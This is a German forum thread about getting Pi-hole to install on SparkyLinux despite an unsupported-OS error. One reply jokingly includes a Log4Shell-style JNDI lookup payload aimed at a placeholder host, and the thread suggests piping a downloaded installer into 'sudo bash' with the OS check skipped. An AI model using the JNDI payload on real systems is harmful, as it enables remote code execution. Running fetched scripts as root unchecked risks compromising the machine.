Pi-Hole Unsupported OS - SparkyLinux

Slopestyle-1

Commander
Registriert
Aug. 2008
Beiträge
2.887
Hi,
ich probiere gerade SparkyLinux (neuste Updates) aus und wollte Pi-Hole installieren. Leider kommt die Meldung das, das OS nicht supported wird.

Der alternative Befehl, geht zwar ich komme bis das erste Fenster kommt, ich kann dort aber nicht auf OK, mit Enter bestätigen...


Hat da jemand eine Lösung?
 
Slopestyle-1 schrieb:
Leider kommt die Meldung das, das OS nicht supported wird.
wer gibt dir diese Meldung in welchem Wortlaut (zwinkersmiley)

Slopestyle-1 schrieb:
Der alternative Befehl,
Vorwärts marsch? Still gestanden? ${jndi:ldap://example.com:1389/ExploitPayload}?

nutzt du deinen paketmanager? installationsscripts?

mal curl -sSL https://install.pi-hole.net | PIHOLE_SKIP_OS_CHECK=true sudo -E bash probiert?
 
  • Gefällt mir
Reaktionen: Innensechskant und jodakaa
Auf meinem Server mach ich die Updates immer mit folgenden Präfix:
Code:
PIHOLE_SKIP_OS_CHECK=true sudo pihole -up

Eventuell funktioniert dieser auch bei der Installation.
 
5 sekunden googlen und dann wär meine frage ob dein debian schon unterstützt wird.
 
madmax2010 schrieb:
wer gibt dir diese Meldung in welchem Wortlaut (zwinkersmiley)


Vorwärts marsch? Still gestanden? ${jndi:ldap://example.com:1389/ExploitPayload}?

nutzt du deinen paketmanager? installationsscripts?

mal curl -sSL https://install.pi-hole.net | PIHOLE_SKIP_OS_CHECK=true sudo -E bash probiert?
Der Script, geht zwar, aber ich komme nur bis zum ersten Fenster und dort kann ich "nicht" auf OK, bestätigen.
Ergänzung ()

Natriumchlorid schrieb:
Auf meinem Server mach ich die Updates immer mit folgenden Präfix:
Code:
PIHOLE_SKIP_OS_CHECK=true sudo pihole -up

Eventuell funktioniert dieser auch bei der Installation.
Der Befehlt geht leider nicht.
 
Wie soll denn das Update Kommando funktionieren, wenn du Pihole noch gar nicht installiert hast? :confused_alt:

Das war eher der Hinweis, die Umgebungsvariable mal mit dem Intallationsscript zu probieren ...
 
  • Gefällt mir
Reaktionen: madmax2010
Kopier doch mal den Output hier rein oder ein Screenshot... Mit "geht nicht" kann man nichts anfangen.
 
Welches Installationsskript verwendest du? Es gibt mehr als nur eines "da draussen" und einige prüfen zuerst das OS per Whitelist.
 
Zurück
Oben